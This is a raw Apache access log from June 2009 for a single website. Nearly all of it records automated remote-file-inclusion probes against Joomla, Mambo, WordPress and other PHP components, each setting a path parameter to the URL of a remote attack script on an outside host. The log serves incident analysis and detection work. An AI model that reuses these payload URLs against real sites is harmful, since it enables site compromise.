217.147.29.190 - - [12/Jun/2009:07:11:13 -0700] "GET /logs/access_070812.log/?mosConfig_admin_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:04 -0700] "GET /logs/access_071112.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:05 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:06 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:06 -0700] "GET /logs/access_071112.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:06 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:06 -0700] "GET /logs/access_071012.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:07 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:07 -0700] "GET /logs/access_071112.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:07 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:07 -0700] "GET /logs/access_071012.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:07 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:07 -0700] "GET /logs/access_071012.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:12 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:12 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:12 -0700] "GET /logs/access_071112.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:34:12 -0700] "GET /logs/access_071012.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:35:06 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:35:08 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:35:11 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:35:15 -0700] "GET /logs/access_071112.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:07:35:15 -0700] "GET /logs/access_071012.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:07:36:01 -0700] "GET /default.php?page=homehttp://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:07:36:05 -0700] "GET /logs//default.php?page=homehttp://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:07:52:47 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://byz9991.jatimcrew.com/bot/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:07:52:48 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://byz9991.jatimcrew.com/bot/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:07:52:49 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://byz9991.jatimcrew.com/bot/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:07:54:11 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
89.108.67.97 - - [12/Jun/2009:07:56:08 -0700] "GET /logs/access_071212.log//index.php?pagina=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
89.108.67.97 - - [12/Jun/2009:07:56:09 -0700] "GET /index.php?pagina=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
89.108.67.97 - - [12/Jun/2009:07:56:09 -0700] "GET /logs//index.php?pagina=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
116.36.213.166 - - [12/Jun/2009:08:04:17 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
116.36.213.166 - - [12/Jun/2009:08:04:17 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
116.36.213.166 - - [12/Jun/2009:08:04:17 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
116.36.213.166 - - [12/Jun/2009:08:05:28 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
116.36.213.166 - - [12/Jun/2009:08:05:29 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
116.36.213.166 - - [12/Jun/2009:08:05:29 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:08:16:25 -0700] "GET /logs/access_070812.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:08:16:30 -0700] "GET /logs//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
218.249.36.194 - - [12/Jun/2009:08:19:23 -0700] "GET /logs/access.log%20%20/joomla/index.php?option=com_restaurante&task=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.249.36.194 - - [12/Jun/2009:08:19:23 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.249.36.194 - - [12/Jun/2009:08:30:48 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.249.36.194 - - [12/Jun/2009:08:30:49 -0700] "GET /logs/access.log%20%20/joomla/index.php?option=com_restaurante&task=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.249.36.194 - - [12/Jun/2009:08:30:49 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.85.165.10 - - [12/Jun/2009:08:33:48 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
70.85.165.10 - - [12/Jun/2009:08:33:48 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
70.85.165.10 - - [12/Jun/2009:08:33:51 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
70.85.165.10 - - [12/Jun/2009:08:34:13 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:08:36:17 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:08:36:17 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:08:42:17 -0700] "GET /logs/access_071212.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:08:42:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:08:42:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:43:53 -0700] "GET /modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:43:55 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:43:55 -0700] "GET /modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.27.203.107 - - [12/Jun/2009:08:43:55 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
218.27.203.107 - - [12/Jun/2009:08:43:55 -0700] "GET /include.php?path[docroot]=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
218.27.203.107 - - [12/Jun/2009:08:43:55 -0700] "GET /logs//include.php?path[docroot]=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:43:58 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:44:01 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:08:45:00 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:08:45:00 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:08:45:00 -0700] "GET /logs/access_071212.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:45:49 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:45:54 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:45:54 -0700] "GET /logs/access_071212.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:45:58 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:45:58 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:45:58 -0700] "GET /logs/access_071212.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:08:46:43 -0700] "GET /logs/access_071212.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:08:46:56 -0700] "GET /logs/access_071112.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.246.20.221 - - [12/Jun/2009:08:47:01 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.246.20.221 - - [12/Jun/2009:08:47:01 -0700] "GET /logs/access_070812.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.246.20.221 - - [12/Jun/2009:08:47:02 -0700] "GET /logs/access_071012.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.27.203.107 - - [12/Jun/2009:08:47:06 -0700] "GET /logs/access_070912.log//include.php?path[docroot]=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:47:13 -0700] "GET /logs/access_071112.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:47:13 -0700] "GET /logs/access_071112.log%20%20//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:47:14 -0700] "GET /logs/access_071112.log%20%20//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:47:27 -0700] "GET /logs/access_071212.log%20%20//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:08:47:28 -0700] "GET /logs/access_071212.log%20%20//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.246.20.221 - - [12/Jun/2009:08:47:32 -0700] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.246.20.221 - - [12/Jun/2009:08:47:33 -0700] "GET /logs/access_071012.log//components/com_simpleboard/image_upload.php?sbp=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:47:36 -0700] "GET /logs/access_071112.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
193.34.167.192 - - [12/Jun/2009:08:47:48 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
193.34.167.192 - - [12/Jun/2009:08:47:48 -0700] "GET /logs/access_070812.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
193.34.167.192 - - [12/Jun/2009:08:47:48 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:47:49 -0700] "GET /logs/access_071212.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:47:52 -0700] "GET /logs/access_071212.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:08:47:58 -0700] "GET /logs/access_071212.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:08:47:58 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:08:47:58 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:48:25 -0700] "GET /logs/access_071112.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:48:41 -0700] "GET /logs/access_071112.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.27.203.107 - - [12/Jun/2009:08:50:37 -0700] "GET /logs/access_071012.log%20//include.php?path[docroot]=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:08:51:06 -0700] "GET /logs/access_071112.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:08:51:34 -0700] "GET /logs/access_071212.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:08:52:21 -0700] "GET /logs/access_071112.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:08:54:31 -0700] "GET /logs/access_071112.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.34.167.192 - - [12/Jun/2009:08:56:17 -0700] "GET /logs/access_070812.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:08:56:32 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:08:56:35 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:08:56:35 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:57:12 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:57:12 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:08:57:12 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:58:07 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:58:10 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:08:58:10 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:02:24 -0700] "GET /logs/access_071012.log%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:02:30 -0700] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.147.30.80 - - [12/Jun/2009:09:02:34 -0700] "GET /logs/access_071012.log/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.rentpreview.com/demo//images/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
217.147.30.80 - - [12/Jun/2009:09:02:35 -0700] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.rentpreview.com/demo//images/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:02:35 -0700] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
